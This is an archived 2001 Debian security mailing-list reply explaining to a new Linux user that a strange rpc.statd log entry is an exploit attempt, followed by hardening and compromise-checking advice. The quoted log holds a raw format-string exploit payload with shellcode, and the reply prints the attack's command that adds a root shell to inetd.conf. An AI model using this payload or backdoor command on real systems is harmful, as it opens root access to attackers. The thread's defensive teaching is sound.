Re: strange log entry

To: <trev26@ihug.com.au>
Cc: <debian-security@lists.debian.org>
Subject: Re: strange log entry
From: David Ehle <ehle@iit.edu>
Date: Thu, 24 May 2001 09:26:09 -0500 (CDT)
Message-id: <Pine.LNX.4.30.0105240856380.13331-100000@hep00.phys.iit.edu>
In-reply-to: <200105240507.PAA17435@new-smtp1.ihug.com.au>

On Thu, 24 May 2001 trev26@ihug.com.au wrote:

What you have there is someone trying to do a buffer overflow attack on
rpc.statd.  The idea is that once the buffer is blown, they will get a
chance to issue a command as root.  In the attack that was attempted on on
of the  systems I was given to supervise the last part of the garbage sent
to the buffer was:
/bin/sh -c echo 9704 stream tcp nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd

This, if it had succeeded,  would have created a new line in inetd.conf
and restarted inetd.  Then they would have come in on port 9704 to a nice
root shell and did what ever they wanted to do.... probably remove that line,
edit my logs, install a root kit, and leave as quietly as possible.

Luckily this time it didn't work and left some dirty footprints as
evidence.

As stated earlier the best way to deal with this, if you don't need rpc
services running for NFS/NIS or something similar is to just shut
portmapper and all the other RPC services down and remove them from your
start up scripts.  I was curios however, so I just made sure tcp wrapper
-tcpd - covered portmapper and added portmap: ALL to my /etc/hosts.deny
file so I could gather some IP numbers via TCPD logging. Figure I should
let the networks assigned the IPs know that some of their machines are
compromised/being used for cracking.

While setting up a firewall as others have previously suggested is a dang
good idea, don't forget to use tcp wrappers also, if for only the logging.
For the security conscious, or the inexperienced a good first step right
after first booting a machine is to type su -c "echo ALL:ALL >
/etc/hosts.deny" root . I'd do that before even connecting to the network.
Later if you must you can relax it a bit, but its a good place to start.

Howerver, now that you have seen this one attack, you should probably go
over your logs and system accounting files with a fine tooth comb and see
if anyone else might have succeeded before or after ;)

This is a far from exhaustive list but try:
looking for any breaks in your log files or unexpected daemon restarts.
examine your crontabs to see if there are any jobs you didn't put there.
check your /etc/passwd file for any unrecognized users or strange shells.
check inetd.conf for any odd entries.
run a find / -m x to look for new or edited files. see if there are any
there that you don't remember editing. Look for changed permissions too.
download at root kit detector and see if anyone has already left you a
present.

again this is just the start ;)

I apologize to folks who consider this all old-news, but trevs was brave
enough to admit he didn't know, so there are probably a few others lurking
in the same boat ;)

Good luck!

   David.
 > Heya :)
>
> I was running a 'tail -f' on my /var/log/messages and this entry appeared while
> I was connected to the internet:
>
> May 24 10:08:11 noogies -- MARK --
> May 24 10:20:34 noogies
> May 24 10:20:34 noogies /sbin/rpc.statd[151]: gethostbyname error for
> ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> May 24 10:20:34 noogies
> Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ
>
> and it has me worried it may be a security issue. I'm very new to linux, and
> newer again to debian, and at this stage I really don't have a clue as to what
> the above log entry is trying to tell me...
>
> Any input or comments would be very appreciated :)
>
> Thank you
>
> - trevs
>
>
>
> --
> To UNSUBSCRIBE, email to debian-security-request@lists.debian.org
> with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org
>
>

Reply to:

References:
- strange log entry
  - From: trev26@ihug.com.au

Prev by Date: Re: strange log entry
Next by Date: Re: wdm & security
Previous by thread: Re: strange log entry
Next by thread: RE: strange log entry
Index(es):
- Date
- Thread